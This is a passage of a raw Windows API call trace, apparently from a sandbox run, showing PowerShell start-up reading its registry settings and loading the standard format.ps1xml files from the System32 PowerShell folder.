(in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.814] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.814] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.815] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.847] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0107.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0107.847] CoTaskMemFree (pv=0x2af370) [0107.865] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.881] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.882] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.883] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.883] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.888] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.891] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.903] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.911] VirtualQuery (in: lpAddress=0x10c030, lpBuffer=0x10cef0, dwLength=0x30 | out: lpBuffer=0x10cef0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0107.913] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x340) returned 0x0 [0107.913] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x10d4fc, lpData=0x0, lpcbData=0x10d4f8*=0x0 | out: lpType=0x10d4fc*=0x1, lpData=0x0, lpcbData=0x10d4f8*=0x74) returned 0x0 [0107.913] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x74) returned 0x0 [0107.913] CoTaskMemAlloc (cb=0x78) returned 0x231930 [0107.913] RegQueryValueExW (in: hKey=0x340, lpValueName="path", lpReserved=0x0, lpType=0x10d43c, lpData=0x231930, lpcbData=0x10d438*=0x74 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d438*=0x74) returned 0x0 [0107.913] CoTaskMemFree (pv=0x231930) [0107.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0107.914] SetErrorMode (uMode=0x1) returned 0x1 [0107.914] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0107.914] SetErrorMode (uMode=0x1) returned 0x1 [0107.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.915] SetErrorMode (uMode=0x1) returned 0x1 [0107.915] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0107.917] SetErrorMode (uMode=0x1) returned 0x1 [0107.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0107.917] SetErrorMode (uMode=0x1) returned 0x1 [0107.917] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0107.918] SetErrorMode (uMode=0x1) returned 0x1 [0107.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.918] SetErrorMode (uMode=0x1) returned 0x1 [0107.919] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0107.920] SetErrorMode (uMode=0x1) returned 0x1 [0107.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.920] SetErrorMode (uMode=0x1) returned 0x1 [0107.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0107.921] SetErrorMode (uMode=0x1) returned 0x1 [0107.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0107.922] SetErrorMode (uMode=0x1) returned 0x1 [0107.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0107.923] SetErrorMode (uMode=0x1) returned 0x1 [0107.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0107.923] SetErrorMode (uMode=0x1) returned 0x1 [0107.923] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0107.925] SetErrorMode (uMode=0x1) returned 0x1 [0107.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0107.925] SetErrorMode (uMode=0x1) returned 0x1 [0107.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0107.925] SetErrorMode (uMode=0x1) returned 0x1 [0107.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0107.926] SetErrorMode (uMode=0x1) returned 0x1 [0107.926] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0107.926] SetErrorMode (uMode=0x1) returned 0x1 [0107.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0107.926] SetErrorMode (uMode=0x1) returned 0x1 [0107.926] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d3c0 | out: lpFileInformation=0x10d3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0107.928] SetErrorMode (uMode=0x1) returned 0x1 [0107.929] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0107.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0107.929] CoTaskMemFree (pv=0x2af370) [0107.946] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0107.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0107.946] CoTaskMemFree (pv=0x2af370) [0107.947] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0107.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0107.947] CoTaskMemFree (pv=0x2af370) [0107.948] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0107.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0107.948] CoTaskMemFree (pv=0x2af370) [0107.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.948] SetErrorMode (uMode=0x1) returned 0x1 [0107.949] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0107.949] GetFileType (hFile=0x310) returned 0x1 [0107.949] SetErrorMode (uMode=0x1) returned 0x1 [0107.949] GetFileType (hFile=0x310) returned 0x1 [0107.949] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0107.954] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0107.954] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0107.955] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0107.955] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0107.955] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0107.955] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x9e2, lpOverlapped=0x0) returned 1 [0107.956] ReadFile (in: hFile=0x310, lpBuffer=0x34d9002, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9002*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0107.956] ReadFile (in: hFile=0x310, lpBuffer=0x34d9ab8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34d9ab8*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0107.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.957] SetErrorMode (uMode=0x1) returned 0x1 [0107.957] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0107.957] SetErrorMode (uMode=0x1) returned 0x1 [0107.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.957] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x310) returned 0x0 [0107.957] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0107.957] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a5910 [0107.957] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x1b9a5910, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0107.957] CoTaskMemFree (pv=0x1b9a5910) [0107.957] RegCloseKey (hKey=0x310) returned 0x0 [0107.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0107.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0108.062] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4a9695e0, Data2=0xad4f, Data3=0x4aad, Data4=([0]=0xbc, [1]=0x2b, [2]=0xf8, [3]=0xa7, [4]=0x62, [5]=0xe3, [6]=0xf7, [7]=0xe8))) returned 0x0 [0108.100] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x238a7a7e, Data2=0x6e06, Data3=0x4efe, Data4=([0]=0xbb, [1]=0xd1, [2]=0x44, [3]=0xae, [4]=0x79, [5]=0x8e, [6]=0xeb, [7]=0x40))) returned 0x0 [0108.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0108.103] SetErrorMode (uMode=0x1) returned 0x1 [0108.103] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0108.104] GetFileType (hFile=0x340) returned 0x1 [0108.104] SetErrorMode (uMode=0x1) returned 0x1 [0108.104] GetFileType (hFile=0x340) returned 0x1 [0108.104] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.106] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.107] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.107] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.108] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.108] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0xfb2, lpOverlapped=0x0) returned 1 [0108.108] ReadFile (in: hFile=0x340, lpBuffer=0x338655a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x338655a*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.108] ReadFile (in: hFile=0x340, lpBuffer=0x3386e40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x3386e40*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.108] CloseHandle 